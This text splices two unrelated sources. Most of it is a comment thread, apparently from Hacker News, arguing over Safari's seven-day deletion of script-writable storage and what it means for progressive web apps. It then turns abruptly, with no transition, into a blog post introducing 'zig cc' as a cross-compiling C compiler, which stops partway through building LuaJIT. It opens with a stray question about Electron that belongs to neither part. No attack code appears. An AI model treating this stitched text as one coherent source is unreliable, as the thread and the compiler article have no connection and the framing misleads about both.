Why? Why isn't the case that the code which runs Electron, and library code JIT-ted by Electron can't be reused by other processes on the same system?

The_rationalist(10000) 3 days ago [-]

It can be reused, it's just that nobody actually care enough about contributing to upstream electron. There are unofficial solutions like electron-shared. Ionic and Carlo also use only one chromium for every instance.

burtonator(1948) 3 days ago [-]

I ported Polar (https://getpolarized.io/) over to a PWA about a year ago.

It's kind of a nightmare due to both Google and Apple messing things up.

PWAs could be an amazing platform but both companies are really messing it up.

Apple is trying to kill them by giving plausible explanations as to why they can't have PWAs. Security this, blah blah blah. There's no reason they can't have PWAs work well in Safari other than they want you to port your app to the App Store and get locked into their native APIs.

Google's problem is, well, they're Google. Meaning things are somewhat incoherent, docs are all over the place, they start new initiatives then abandon them half way, etc.

Consumers are another problem. They have no understanding of PWAs and they go to the app store, don't find us, and then complain we don't have an app..

The plan now is to use Google TWAs and port our PWA to Android.

We're going to do the same thing to Apple after we do the Android release BUT I think there's a 50% chance that apple will just flat out block us.

I think we might have a chance of getting around it if we use mobile gestures properly, use platform specific APIs like the camera, audio, and GPS that aren't on web and try to really integrate into the platform properly.

For example, they have an API to detect dark mode now. IF that's on we're just going to magically enable our dark mode in our app.

Razengan(4083) 3 days ago [-]

> ... Consumers are another problem. ...

You blame Apple, Google and your consumers, instead of just making native apps. Why?

comex(1470) 3 days ago [-]

I tried using your app on an iPhone (with Add to Home Screen).

- If I press the settings gear, the text on the settings page is about twice as wide as the screen, requiring horizontal scrolling.

- On the front page, if I open the color picker, it's partially offscreen.

- On all pages, if I do a scroll gesture in the wrong direction, it scrolls the entire UI rather than just the scrollable part. Admittedly, iOS has long made this hard to avoid without hacky JavaScript, but it's been doable, and it's much easier now [1].

- The hamburger button on the left opens a modal view that covers all of the screen but a small margin on the right, making it unreasonably hard to exit.

- If I try to create a tag or folder, the name prompt appears under the other modal view and is improperly sized.

- Oh, and the UI looks thoroughly non-native, e.g. Google-style floating action button, UI not covering the status bar, bottom tab buttons too short, etc. The animations are also haphazard.

My point is not just to nitpick. It's just that while I sympathize with the idea of PWAs in principle, almost every single time I see someone talk about theirs, the PWA in question has immediately obvious glaring UI defects that have nothing to do with browser limitations, and leave it far below the standard of a good native app, or even a bad one. I honestly don't know why this is, but experiencing it over and over makes it hard for me to care about PWAs.

[1] https://benfrain.com/preventing-body-scroll-for-modals-in-io...

dazbradbury(1767) 3 days ago [-]

Regarding your point on consumers, we put our PWA/TWA into the app store (for the reason you outlined) - and now get a raft of negative reviews that the TWA is the same as the mobile site... Which is frustrating, because that's the point.

Making it clear why a TWA is in the app store is hard in itself. Trying to explain why it's better for consumers over a native app + mobile site is even harder.

See these reviews for yourself here: https://play.google.com/store/apps/details?id=uk.co.openrent

quickthrower2(1376) 3 days ago [-]

Makes sense, they want you to create native apps so they can collect their rent, and also dictate what is in, what is out, and control searching of apps.

vosper(4327) 3 days ago [-]

> There's no reason they can't have PWAs work well in Safari other than they want you to port your app to the App Store and get locked into their native APIs.

Is it possible they also want you to port your app to the App Store to prevent an explosion of garbage and malware that could happen if PWAs really took off?

b1tr0t(4339) 3 days ago [-]

Hi there, I'm the product manager for PWAs on the Chrome team.

Very interested in hearing about pain points you've had building out PWAs, especially if there's features you were keen on that haven't been released. Easiest way to reach me is on Twitter: https://twitter.com/b1tr0t

Fully agree with you that docs are all over the place. We've started to consolidate docs under web.dev, and the PWA section launched recently (https://web.dev/progressive-web-apps). Consolidating and adding docs is an active area of investment, and our goal is to create a well lit path for developers to succeed with PWAs.

6gvONxR4sf7o(10000) 2 days ago [-]

> Consumers are another problem. They have no understanding of PWAs...

Really? You're blaming your customers for not being sufficiently tech savvy and not wanting what you're providing?

Personally, I am happy with Apple's decision here.

Animats(2152) 3 days ago [-]

What are private client-side PWAs anyway?

Good question. The definition of a 'progressive web app' is vague. What they seem to mean is a web page which, once you visit it, is cached locally, and thereafter runs locally. The web page accesses various servers, not necessarily ones from the same domain as the web page. Persistent state, if any, is stored locally. The page gets its own icon on the home screen somehow, so it sort of looks like an 'app'.

Apparently 'progressive web apps' are supposed to have a browser service worker so they can get notifications pushed to them from somewhere, although it's not clear why that's essential. That would seem to depend on whether the function performed requires being notified of something happening elsewhere.

Apple apparently dislikes this because they don't get to force people to use their store, with their big cut of the revenue.

Is that about right?

Does this only apply to pages read through Apple's browser, or does it impact Firefox, too?

judah(3591) 3 days ago [-]

> Is that about right?

Progressive Web Apps are strictly defined:

1. The app has an app manifest describing metadata about the web app, enabling it to be treated like an app (e.g. it can be installed)

2. The app has a service worker, enabling it to work offline like a native app.

3. It's served over HTTPS.

Those are the 3 technical requirements of a PWA.

There's also the philosophical direction of Progressive Web Apps: they're progressive, meaning they offer the app's essential experience no matter the device, but enhance progressively based on the device they're running on. That is, more capable devices let the app offer more functionality without blocking out users on lower-end devices.

JumpCrisscross(38) 3 days ago [-]

> Apple apparently dislikes this because they don't get to force people to use their store

This is part of the motivation. The other is advertisers using persistent local storage to track users [1].

[1] https://clearcode.cc/blog/alternatives-to-cookie-tracking/

soapdog(4079) 3 days ago [-]

> Does this only apply to pages read through Apple's browser, or does it impact Firefox, too?

This applies to WebKit, but if that decision sticks Mozilla might follow. Who knows... I hope not. Also be aware that Firefox on iOS is WebKit.

robenkleene(3680) 3 days ago [-]

I'm guessing that Apple will start hindering web apps because the new mouse support in iPadOS is going to be such a boon to web apps. Because of sandboxing, web apps are the only cross-platform apps that can run in their full versions on iPadOS. I wrote a quick summary of the situation[0].

Therefore, since native apps are more of a platform differentiator than web apps, moving forward we can expect Apple to start systemically hindering web apps, especially on ones that are good on iPadOS, in order to boost native apps.

(I'm not saying this necessarily the start of this, but I am saying I'm not surprised. This is exactly the type change, targeting the exact type of app I'd expect to be targeted.)

[0]: https://blog.robenkleene.com/2020/03/20/ipadoss-new-mouse-su...

saagarjha(10000) 3 days ago [-]

The people who work on making websites function better on iPad are literally a 20 second walk away from the people who work in Intelligent Tracking Prevention–do you really think that they'd seek to undermine each other in this way?

cageface(3172) 3 days ago [-]

moving forward we can expect Apple to start systemically hindering web apps

They have been doing this for quite some time now. Always ostensibly to protect users but always also conveniently putting webapps at a permanent disadvantage to native apps.

For my part I'm not interested in being a user of a platform so hostile to the web that it disallows any third party browsers.

ChrisMarshallNY(4343) 3 days ago [-]

As a native app developer, I can live with this.

Veen(10000) 3 days ago [-]

If this were true, how would you explain the recent improvements to Safari on the iPad that make it as capable as desktop Safari. Until last year Google Docs did not work in Safari on the iPad. Now it works very well indeed. The same is true of most web apps.

brundolf(1518) 3 days ago [-]

Which is strange, because they're already under scrutiny for being anti-competitive WRT their app ecosystem. Having good support for web apps could've softened that case a little bit.

madeofpalk(3997) 3 days ago [-]

> I'm guessing that Apple will start hindering web apps because the new mouse support in iPadOS is going to be such a boon to web apps.

As a web developer, I've never believed Apple has hindered web development on their platform, purposefully or not. They just don't spend their resources adding in WebBluetooth or whatever new API-of-the-day Google has decided to come up with.

As I see it, their focus is on the user, which is why they've been slow to adopt APIs that are privacy concerns, or drain battery, or have other negative implications.

wubin(10000) 3 days ago [-]

The source clarifies that this only applies to websites run within the Safari browser.[1] PWAs added to the home screen aren't affected.

> As mentioned, the seven-day cap on script-writable storage is gated on 'after seven days of Safari use without user interaction on the site.' That is the case in Safari. Web applications added to the home screen are not part of Safari and thus have their own counter of days of use. Their days of use will match actual use of the web application which resets the timer. We do not expect the first-party in such a web application to have its website data deleted. If your web application does experience website data deletion, please let us know since we would consider it a serious bug. It is not the intention of Intelligent Tracking Prevention to delete website data for first parties in web applications.

[1] https://webkit.org/blog/10218/full-third-party-cookie-blocki...

the_gipsy(10000) 2 days ago [-]

Good luck getting your app added to the home screen. It only works through safari, so chrome or firefox users are ruled out, and it's hidden under some 'bookmark' or 'share' menu that is too difficult to discover.

iameli(10000) 3 days ago [-]

'Web applications added to the home screen are not part of Safari and thus have their own counter of days of use. Their days of use will match actual use of the web application which resets the timer.'

But said timer... does nothing? Why does it exist?

osrec(3297) 3 days ago [-]

That's a relief. We've built our business on our PWA, which also has an offline mode. It would be annoying if we had to adjust it for (yet another) Safari quirk.

gridlockd(10000) 3 days ago [-]

> 'Web applications added to the home screen are not part of Safari and thus have their own counter of days of use. Their days of use will match actual use of the web application which resets the timer.'

What exactly does that mean? So you use the app for seven (perhaps non-consecutive) days, and now all third parties that haven't been, uh, interacted with, get their data wiped - but not the the first party, because that has been interacted with, by virtue of the PWA being launched in the first place?

I guess that solves the problem?

pcdoodle(3877) 3 days ago [-]

Thank you for the clarification.

modeless(1487) 3 days ago [-]

As the article has been updated to say, 'installing' a PWA to the home screen is an optional step that many people prefer not to do in favor of bookmarks or the address bar or the new tab page or whatever.

But it's no surprise that Apple would want to impose an 'install' step on the web to prevent it from looking more attractive than the App Store.

pier25(2695) 3 days ago [-]

Ok but OTOH Apple is not helping PWAs by hiding the 'Add to home screen' in submenus and not having an official API to show a banner like Chrome has on Android.

Edit:

Also what about desktop?

untog(2451) 3 days ago [-]

I don't think that's actually what it clarifies. Or at the very least it's very confusing.

> have their own counter of days of use. Their days of use will match actual use of the web application which resets the timer.

This makes it sound very much like homescreen apps will have their data wiped after 7 days of non-use.

> We do not expect the first-party in such a web application to have its website data deleted.

And this does not. It's a very confusing word salad.

btown(3769) 3 days ago [-]

If there is, as they say, a dedicated counter on those home screen applications, what is the threshold? Will home page PWA apps not used often (say, for infrequent uses like travel) have first party data deleted after the icon isn't clicked for some time? This is highly unclear and confusing.

finaliteration(4235) 3 days ago [-]

I'm a little confused by this and maybe I'm missing something. Wasn't localStorage always intended to be treated as a volatile storage mechanism for non-critical data and caching? The advice I've seen for several years says to avoid storing sensitive or critical data there.

Can PWAs not switch to using IndexedDB which seems like it's more purpose-built for this use case?

No snark intended. I'm legitimately curious what the situation is and where any blockers are.

nicoburns(10000) 3 days ago [-]

> Can PWAs not switch to using IndexedDB which seems like it's more purpose-built for this use case?

IndexedDB is also subject to the 7 day limit. Leaving no persistent storage for web apps at all.

judah(3591) 3 days ago [-]

In the original post from Apple[0] announcing these measures, they've listed all script-writable locations are subject to cache clearing:

- Indexed DB

- LocalStorage

- Media keys

- SessionStorage

- Service Worker registrations (I guess this means service worker caches)

[0]: https://webkit.org/blog/10218/full-third-party-cookie-blocki...

throaway9aaaapp(10000) 3 days ago [-]

Our company has started shaming iOS. We tell users that because of a commercial policy aiming to increase their revenue from their App Store, iPhones and Ipads 'do not support the Web 2.0 technology enabling powerful experiences for web sites and web applications, while Android and Windows devices have been supporting this technology since 201x'. We briefly explain in one sentence that it would not be the best use of our resources to try to bypass Apple's technological decisions but that they should contact Apple for further information.

We then link them to a $30-$50 Android device that they can buy on Amazon and use as a second device to use our services 'if they are interested in a more powerful web experience'. We provide a basic version to all users, but put a shamewall for advanced features. Best use of our time and resources.

It is time to push back, stop making Apple's problems your problems. Educate people without ranting and offer them solutions, developers have the bad habit of trying to cover up this kind of non-sense and taking the blame while really Apple are the ones who should be ashamed. If people love your product/service getting a $30 phone to be power users and make their life easier and their experience richer will not be a big deal for them. It's all about educating them the right way.

spzb(4265) 3 days ago [-]

Obviously I have no idea what your product is but if I got that message I'd just likely go to one of your competitors (assuming they exist). I wouldn't go and buy another device unless it was for an absolutely critical application.

staplers(10000) 3 days ago [-]

Sounds extremely condescending and off-putting. I'd be annoyed if a company said this to me.

There is a lot to love about Apple products outside of a few safari restrictions. They're not perfect but better than a lot of alternatives.

Hackbraten(10000) 3 days ago [-]

Are you aware of the poor security a $30 phone has?

jbeam(10000) 3 days ago [-]

I would have to REALLY love your service to want to carry around an extra device to use it.

SifJar(3849) 3 days ago [-]

In addition to what others have said, I think the effectiveness of this likely depends heavily on the target audience - to a non-technical user, this will probably come across as lazy. From their perspective, everything else works fine on Apple, so you must be complaining about nothing.

Of course, if everyone did the same, people would start to realise the problem might be with Apple, but the chances of all (or most, or even many) big web services deciding to alienate such a large portion of their (potential) customers seem slim.

jamil7(4303) 3 days ago [-]

> If people love your product/service getting a $30 phone to be power users and make their life easier and their experience richer will not be a big deal for them.

So you're suggesting shifting the development costs of you building a native / cross platform app directly to your customers? Does this work?

untog(2451) 3 days ago [-]

What technologies does Safari not support that you need?

That's a genuine question by the way. I've been frustrated by Apple's reluctance in the past but since they implemented Service Workers things have gotten better. I still really wish they had Web Push but I do understand at least conceptually why they'd be hesitant.

judah(3591) 3 days ago [-]

On one hand, I don't like this direction from Apple because it's meant to boost Apple's proprietary app store business -- which directly competes with the open web -- but masquerades as a privacy issue.

On the other hand, this direction keeps web devs honest: local storage, service worker, cookies and other script-writable areas are meant to be temporary.

fomojola(3588) 3 days ago [-]

I see nothing in any of the specs that implies local storage was intended to be temporary? You could argue cookies, maybe, but even that I'd dispute: it is a user-agent, I should be able to tell it 'don't delete my stuff'. I already have browser controls over my local storage: I can go into settings in every reasonable browser and flush that down the tubes.

mr_toad(4125) 3 days ago [-]

It's always been impossible to rely on local storage for long-term use.

Users clear their caches. They swap browsers. They swap machines. They use their phone instead of their desktop. They use private mode, or sand boxing. They re-install their OS. They buy a new machine.

Don't be lazy. Using local storage without a backup is not acceptable.

And what kind of 'progressive' web app expects all the features in every client? Have we forgotten what progressive means?

Don't be entitled. You are not more important than your users.

lnanek2(4206) 3 days ago [-]

Based on the blog, it sounds like he wants to downloaded RSS feeds to the user's device, and not store them on his server to speed up development (all those complaints about FAANG being able to develop at web scale and him not wanting to run a backend).

Then, if the user clears cache or changes computers, they lose the stuff they were following and have to wait for new items, but it's not the end of the world. They might even expect it if you name/describe the app a certain way.

E.g. if you download an app called 'Podcast Downloader' that says it just downloads any new podcasts from feeds you follow for your later offline consumption on your current device - you might not expect a podcast on your phone to magically jump to your desktop without a re-download from the original site.

Seems like it could be a valid trade off if it lets a front end only web dev publish apps he couldn't publish otherwise because he can't/won't do backend. Storing user media on the backend is not cheap. The company I'm at has spent months of developer time moving over from Google to Amazon, for example, just for infra cost improvements that come from serving terrabytes of data off one instead of the other.

sandstrom(10000) 3 days ago [-]

How would static 'single-page' apps (HTML/JS/CSS) that store session tokens in localStorage avoid 7-day auto-logout?

Perhaps using something like this: https://developer.mozilla.org/en-US/docs/Web/API/Credential_...

Anyone know of other Web APIs that could be used?

aurbano(4343) 3 days ago [-]

Cookies are a lot safer for authentication than localStorage. The only problem with this change is persisting data for offline use, not authenticating the user.

jdxcode(10000) 3 days ago [-]

might have to use cookies

saagarjha(10000) 3 days ago [-]

Related discussion from earlier today: https://news.ycombinator.com/item?id=22683535

WebKit blog post from yesterday: https://news.ycombinator.com/item?id=22677605

dang(182) 3 days ago [-]

I think we'll merge today's threads. Any reason not to? Edit: merged.

restoreddev(4086) 3 days ago [-]

I guess this means Safari won't support persistent storage anytime soon. I was looking forward to it becoming a standard API. https://developer.mozilla.org/en-US/docs/Web/API/StorageMana...

OJFord(2776) 3 days ago [-]

Based on the table there it seems Edge had but removed support anyway?

heynk(4035) 3 days ago [-]

I'm an engineer at a platform that makes it easier to build privacy-friendly apps. This means that all apps on our platform have app-specific private keys stored on the client side (in localStorage), and they never touch a server.

With this change, you're essentially 'logged out' after 7 days of inactivity.

This is pretty a bad user experience. I honestly am not sure how to mitigate this. MacOS Safari might not be a massive market, but iOS Safari is.

Any thoughts about how we should address this change?

oefrha(4165) 3 days ago [-]

Being logged out after 7 days of inactivity could be a little bit annoying but I can live with that, as long as I can log in again.

I could be misinterpreting your comment but are you saying your keys are simply destroyed upon this "log out"? Then I'm not really sure why your platform was considered working in the first place, if it's tied to a specific browser of a specific device and won't survive a clearing of storage which any user can do at any time for a variety of reasons?

Andrew_nenakhov(10000) 3 days ago [-]

The issue would be not that problematic if I could just run a real Firefox browser on iOS, not a skin over Safari, which leads me to a question that puzzles me for a long time.

Why Apple is not facing antitrust charges for not allowing competing browsers on their platform? Microsoft didn't SHIP competing browsers, but allowed them to run just fine on windows, and was fined nonetheless, but Apple somehow gets away with not even allowing competing browsers at all!

I'm not from the US, so maybe I'm missing something about these antitrust lawsuits. Can someone please explain?

Karunamon(3106) 3 days ago [-]

This is a common misconception.

1. Apple is not a monopoly player in the app market.

2. Microsoft's antitrust fine was for forcing OEMs to not include any competing browsers (Netscape) on threat of losing special pricing.

judge2020(4287) 3 days ago [-]

Is there any evidence that local storage is being used as a pseudo-cookie way of tracking users? If so, keeping local storage saved while regular cookies are being deleted would defeat the purpose of deleting cookies for anti-tracking reasons.

majormajor(10000) 3 days ago [-]

I was in the adtech world about ten years ago, and localstorage was definitely one of the things used for 'supercookie' stuff (along with Flash, etags, and probably other stuff I'm forgetting).

hosteur(10000) 3 days ago [-]

This is exactly what it is about. I welcome the move from Apple. Web devs can store state server side. They cry because tracking will be harder now.

JumpCrisscross(38) 3 days ago [-]

> Is there any evidence that local storage is being used as a pseudo-cookie way of tracking users?

Yes [1].

[1] https://clearcode.cc/blog/alternatives-to-cookie-tracking/

bradgessler(2194) 3 days ago [-]

Do any lawyers out there know if Apple's sabotage of PWA's by their inaction or 'features' like this could be considered anti-competitive behavior for an anti-trust lawsuit?

yaktubi(10000) 3 days ago [-]

Not a lawyer but probably not. There's many ways to make an App for their platforms. Just because people want to use web technologies is an implementors decision.

alkonaut(10000) 3 days ago [-]

Did PWA's take off? What are some famous/big PWA's now? I can't remember ever 'installing' anything in a browser as an app, or even being asked if I wanted to do it. Am I misunderstanding what they are?

Macha(3795) 3 days ago [-]

devdocs.io is the most successful example I'm aware of. I've never 'installed' it as an app, as I don't use a browser that supports that (basically Edge, Safari or Android Chrome), but I've certainly relied on its ability to load without an internet connection for train/plane journeys.

judah(3591) 3 days ago [-]

Microsoft will be releasing PWA versions of the Office suite.

Twitter, Instagram, Starbucks, Pinterest and more have PWAs as well.

theturtletalks(4171) 3 days ago [-]

https://appsco.pe/ has popular PWAs. They don't need to be installed, they just look and work like an app on the browser.

shawnz(10000) 3 days ago [-]

The key is the 'P': Progressive. A PWA is just a web app, but one that takes advantage of features you'd typically see in a locally installed application like local storage, notifications, etc. This might mean it has metadata to make it 'installable' in browsers that support that, but I wouldn't say that's a requirement to be considered a PWA.

soapdog(4079) 3 days ago [-]

I'm the OP, I use a lot of PWAs. My main machine is a Surface Pro X and I don't have native apps (as in native aarch64 binaries) for many of the things I'd like to use. So, I'm using PWAs for Instagram, Twitter, Kindle, Pinafore (mastodon client), Spotify, and some of my own.

I was developing a feed reader that was supposed to be a client-side-only PWA but that's tricky.

koonsolo(4238) 3 days ago [-]

Twitter client is a PWA.

seanabrahams(10000) 3 days ago [-]

PWAs haven't taken off because Apple won't implement full Push API support in Safari thus forcing you to go through the App Store if your web site or application needs push notifications. The App Store then complains if you try to publish an app that just wraps your web site so that you can have push notifications. It's... infuriating.

StephenCanis(10000) 3 days ago [-]

PWAs are also useful where you want visitors to be able to access a portion of a website while offline. I run a site that hosts audio tours[1] for museums and walking tours. I use PWAs to allow visitors to quickly download the tour onto their phone in case they don't have a data plan or a portion of the tour will not have cell service.

Apple definitely makes it difficult to use them effectively. For example you need to use Safari on iOS in order to download the PWA - it won't work if you're on chrome or another third party browser.

[1]https://www.youraudiotour.com

arendtio(10000) 3 days ago [-]

How should PWA take off, when Apple with a high mobile market share refuses to implement basic APIs like the Push API and other browsers can't run their own engine on iOS? It is abusive, but who cares.

untog(2451) 3 days ago [-]

There's a chicken/egg issue here. Apple's support for progressive web apps has been subpar, so it's difficult to justify the extra effort in making a PWA when a major platform doesn't fully support it. Which, in turn, means people turn around and say 'why should Apple support PWAs? No-one uses them!'

drkstr(10000) 1 day ago [-]

DevDocs is great for offline documentation, and is entirely a PWA. You just preload the doc sets you're interested while online, and they will always be there for you when you need them. Automatic updates can be enabled for when you come back online.

woodson(4259) 3 days ago [-]

Twitter's web client is a PWA





Historical Discussions: Zig cc: A drop-in replacement for GCC/Clang (March 24, 2020: 826 points)

(826) Zig cc: A drop-in replacement for GCC/Clang

826 points 4 days ago by hazebooth in 10000th position

andrewkelley.me | Estimated reading time – 33 minutes | comments | anchor

`zig cc`: a Powerful Drop-In Replacement for GCC/Clang

If you have heard of Zig before, you may know it as a promising new programming language which is ambitiously trying to overthrow C as the de-facto systems language. But did you know that it also can straight up compile C code?

This has been possible for a while, and you can see some examples of this on the home page. What's new is that the zig cc sub-command is available, and it supports the same options as Clang, which, in turn, supports the same options as GCC.

Now, I'm sure you're feeling pretty skeptical right about now, so let me hook you real quick before I get into the juicy details.

Clang and GCC cannot do this:

[email protected] ~/tmp> cat hello.c
#include <stdio.h>
int main(int argc, char **argv) {
    fprintf(stderr, 'Hello, World!\n');
    return 0;
}
[email protected] ~/tmp> clang -o hello.exe hello.c -target x86_64-windows-gnu
clang-7: warning: argument unused during compilation: '--gcc-toolchain=/nix/store/ificps9si1nvz85f9xa7gjd9h6r5lzg6-gcc-9.2.0' [-Wunused-command-line-argument]
/nix/store/7bhi29ainf5rjrk7k7wyhndyskzyhsxh-binutils-2.31.1/bin/ld: unrecognised emulation mode: i386pep
Supported emulations: elf_x86_64 elf32_x86_64 elf_i386 elf_iamcu elf_l1om elf_k1om
clang-7: error: linker command failed with exit code 1 (use -v to see invocation)
[email protected] ~/tmp> clang -o hello hello.c -target mipsel-linux-musl
In file included from hello.c:1:
In file included from /nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/stdio.h:27:
In file included from /nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/bits/libc-header-start.h:33:
In file included from /nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/features.h:452:
/nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/gnu/stubs.h:7:11: fatal error: 
      'gnu/stubs-32.h' file not found
# include <gnu/stubs-32.h>
          ^~~~~~~~~~~~~~~~
1 error generated.
[email protected] ~/tmp> clang -o hello hello.c -target aarch64-linux-gnu
In file included from hello.c:1:
In file included from /nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/stdio.h:27:
In file included from /nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/bits/libc-header-start.h:33:
In file included from /nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/features.h:452:
/nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/gnu/stubs.h:7:11: fatal error: 
      'gnu/stubs-32.h' file not found
# include <gnu/stubs-32.h>
          ^~~~~~~~~~~~~~~~
1 error generated.

`zig cc` can:

[email protected] ~/tmp> zig cc -o hello.exe hello.c -target x86_64-windows-gnu
[email protected] ~/tmp> wine64 hello.exe
Hello, World!
[email protected] ~/tmp> zig cc -o hello hello.c -target mipsel-linux-musl
[email protected] ~/tmp> qemu-mipsel ./hello
Hello, World!
[email protected] ~/tmp> zig cc -o hello hello.c -target aarch64-linux-gnu
[email protected] ~/tmp> qemu-aarch64 -L ~/Downloads/glibc/multi-2.31/install/glibcs/aarch64-linux-gnu ./hello
Hello, World!

Features of `zig cc`

zig cc is not the main purpose of the Zig project. It merely exposes the already-existing capabilities of the Zig compiler via a small frontend layer that parses C compiler options.

Install simply by unzipping a tarball

Zig is an open source project, and of course can be built and installed from source the usual way. However, the Zig project also has tarballs available on the download page. You can download a 45 MiB tarball, unpack it, and you're done. You can even have multiple versions at the same time, no problem.

Here, rather than downloading the x86_64-linux version, which matches the computer I am currently using, I'll download the Windows version and run it in Wine to show how simple installation is:

[email protected] ~/tmp> wget --quiet https://ziglang.org/builds/zig-windows-x86_64-0.5.0+13d04f996.zip
[email protected] ~/tmp> unzip -q zig-windows-x86_64-0.5.0+13d04f996.zip 
[email protected] ~/tmp> wine64 ./zig-windows-x86_64-0.5.0+13d04f996/zig.exe cc -o hello hello.c -target x86_64-linux
[email protected] ~/tmp> ./hello
Hello, World!

Take a moment to appreciate what just happened here - I downloaded a Windows build of Zig, ran it in Wine, using it to cross compile for Linux, and then ran the binary natively. Computers are fun!

Compare this to downloading Clang, which has 380 MiB Linux-distribution-specific tarballs. Zig's Linux tarballs are fully statically linked, and therefore work correctly on all Linux distributions. The size difference here comes because the Clang tarball ships with more utilities than a C compiler, as well as pre-compiled static libraries for both LLVM and Clang. Zig does not ship with any pre-compiled libraries; instead it ships with source code, and builds what it needs on-the-fly.

Caching System

The Zig compiler uses a sophisticated caching system to avoid needlessly rebuilding artifacts. I carefully designed this caching system to make optimal use of the file system while maintaining correct semantics - which is trickier than you might think!

The caching system uses a combination of hashing inputs and checking the fstat values of file paths, while being mindful of mtime granularity. This makes it avoid needlessly hashing files, while at the same time detecting when a modified file has the same contents. It always has correct behavior, whether the file system has nanosecond mtime granularity, second granularity, always sets mtime to zero, or anything in between.

You can find a detailed description of the caching system in the 0.4.0 release notes.

zig cc makes this caching system available when compiling C code. For simple enough projects, this obviates the need for a Makefile or other build system.

[email protected] ~/tmp> cat foo.c
#include <stdio.h>
#include 'another_file.c'
int main(int argc, char **argv) {
#include 'printf_many_times.c'
}
[email protected] ~/tmp> cat another_file.c 
void another(void) {}
[email protected] ~/tmp> time zig cc -c foo.c
0.12
[email protected] ~/tmp> time zig cc -c foo.c
0.01
[email protected] ~/tmp> touch another_file.c 
[email protected] ~/tmp> time zig cc -c foo.c
0.01
[email protected] ~/tmp> echo '/* add a comment */' >>another_file.c
[email protected] ~/tmp> time zig cc -c foo.c
0.12
[email protected] ~/tmp> time zig cc -c foo.c
0.01

Here you can see the caching system is smart enough to find dependencies that are included with the preprocessor, and smart enough to avoid a full rebuild when the mtime of another_file.c was updated.

One last thing before I move on. I want to point out that this caching system is not some fluffy bloated feature - rather it is an absolutely critical component to making cross-compiling work in a usable manner. As we'll see below, other compilers ship with pre-compiled, target-specific binaries, while Zig ships with source code only and cross-compiles on-the-fly, caching the result.

Cross Compiling

I have carefully designed Zig since the very beginning to treat cross compilation as a first class use case. Now that the zig cc frontend is available, it brings these capabilities to C code.

I showed you above cross-compiling some simple 'Hello, World!' programs. But now let's try a real-world C project.

Let's try LuaJIT!

[~/Downloads]$ git clone https://github.com/LuaJIT/LuaJIT
[~/Downloads]$ cd LuaJIT
[~/Downloads/LuaJIT]$ ls
COPYRIGHT  doc  dynasm  etc  Makefile  README  src

OK so it uses standard Makefiles. Here we go, first let's make sure it works natively with zig cc.

[~/Downloads/LuaJIT]$ export CC='zig cc'
[~/Downloads/LuaJIT]$ make CC='$CC'
==== Building LuaJIT 2.1.0-beta3 ====
make -C src
make[1]: Entering directory '/home/andy/Downloads/LuaJIT/src'
HOSTCC    host/minilua.o
HOSTLINK  host/minilua
DYNASM    host/buildvm_arch.h
HOSTCC    host/buildvm.o
HOSTCC    host/buildvm_asm.o
HOSTCC    host/buildvm_peobj.o
HOSTCC    host/buildvm_lib.o
HOSTCC    host/buildvm_fold.o
HOSTLINK  host/buildvm
BUILDVM   lj_vm.S
ASM       lj_vm.o
CC        lj_gc.o
BUILDVM   lj_ffdef.h
CC        lj_err.o
CC        lj_char.o
BUILDVM   lj_bcdef.h
CC        lj_bc.o
CC        lj_obj.o
CC        lj_buf.o
CC        lj_str.o
CC        lj_tab.o
CC        lj_func.o
CC        lj_udata.o
CC        lj_meta.o
CC        lj_debug.o
CC        lj_state.o
CC        lj_dispatch.o
CC        lj_vmevent.o
CC        lj_vmmath.o
CC        lj_strscan.o
CC        lj_strfmt.o
CC        lj_strfmt_num.o
CC        lj_api.o
CC        lj_profile.o
CC        lj_lex.o
CC        lj_parse.o
CC        lj_bcread.o
CC        lj_bcwrite.o
CC        lj_load.o
CC        lj_ir.o
CC        lj_opt_mem.o
BUILDVM   lj_folddef.h
CC        lj_opt_fold.o
CC        lj_opt_narrow.o
CC        lj_opt_dce.o
CC        lj_opt_loop.o
CC        lj_opt_split.o
CC        lj_opt_sink.o
CC        lj_mcode.o
CC        lj_snap.o
CC        lj_record.o
CC        lj_crecord.o
BUILDVM   lj_recdef.h
CC        lj_ffrecord.o
CC        lj_asm.o
CC        lj_trace.o
CC        lj_gdbjit.o
CC        lj_ctype.o
CC        lj_cdata.o
CC        lj_cconv.o
CC        lj_ccall.o
CC        lj_ccallback.o
CC        lj_carith.o
CC        lj_clib.o
CC        lj_cparse.o
CC        lj_lib.o
CC        lj_alloc.o
CC        lib_aux.o
BUILDVM   lj_libdef.h
CC        lib_base.o
CC        lib_math.o
CC        lib_bit.o
CC        lib_string.o
CC        lib_table.o
CC        lib_io.o
CC        lib_os.o
CC        lib_package.o
CC        lib_debug.o
CC        lib_jit.o
CC        lib_ffi.o
CC        lib_init.o
AR        libluajit.a
CC        luajit.o
BUILDVM   jit/vmdef.lua
DYNLINK   libluajit.so
LINK      luajit
warning: unsupported linker arg: -E
OK        Successfully built LuaJIT
make[1]: Leaving directory '/home/andy/Downloads/LuaJIT/src'
==== Successfully built LuaJIT 2.1.0-beta3 ====
[~/Downloads/LuaJIT]$ ls
COPYRIGHT  doc  dynasm  etc  Makefile  README  src
[~/Downloads/LuaJIT]$ ./src/
host/         jit/          libluajit.so  luajit        zig-cache/    
[~/Downloads/LuaJIT]$ ./src/luajit 
LuaJIT 2.1.0-beta3 -- Copyright (C) 2005-2020 Mike Pall. http://luajit.org/
JIT: ON SSE2 SSE3 SSE4.1 BMI2 fold cse dce fwd dse narrow loop abc sink fuse
> print(3 + 4)
7
> 

OK so that worked. Now for the real test - can we make it cross compile?

[~/Downloads/LuaJIT]$ git clean -xfdq
[~/Downloads/LuaJIT]$ export CC='zig cc -target aarch64-linux-gnu'
[~/Downloads/LuaJIT]$ export HOST_CC='zig cc'
[~/Downloads/LuaJIT]$ make CC='$CC' HOST_CC='$HOST_CC' TARGET_STRIP='echo'
==== Building LuaJIT 2.1.0-beta3 ====
make -C src
